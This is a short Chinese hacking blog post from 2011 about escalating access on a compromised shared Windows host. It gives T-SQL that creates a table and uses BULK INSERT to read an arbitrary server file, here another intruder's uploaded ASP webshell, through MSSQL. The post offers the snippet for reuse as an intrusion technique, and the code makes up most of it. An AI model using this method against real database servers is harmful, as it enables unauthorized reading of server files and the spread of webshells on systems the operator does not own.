MSSQL读取文件命令

各种提权

 

包括

 

:SA

 

:ROOT

 

主机是星外的 可以看到目标目录

 

数据库是ASP的 不能插马

 

无奈找了很多人都木有办法。。。

 

今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL

 

在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下

 

Use www.xxx.com;–(这里是随便选的一个数据库)

  drop table cmd;

  create table cmd (a text);

  BULK INSERT cmd

  FROM ‘d:/freehos/webshell.cc.asp’

  WITH (

  FIELDTERMINATOR = ‘n’,

  ROWTERMINATOR = ‘nn’

  )

  select * from cmd

  这样就成功读出了d:/freehos/ www.xxx.com .asp

posted on 2011-11-12 01:21  0xcc  阅读(748)  评论(0编辑  收藏  举报

导航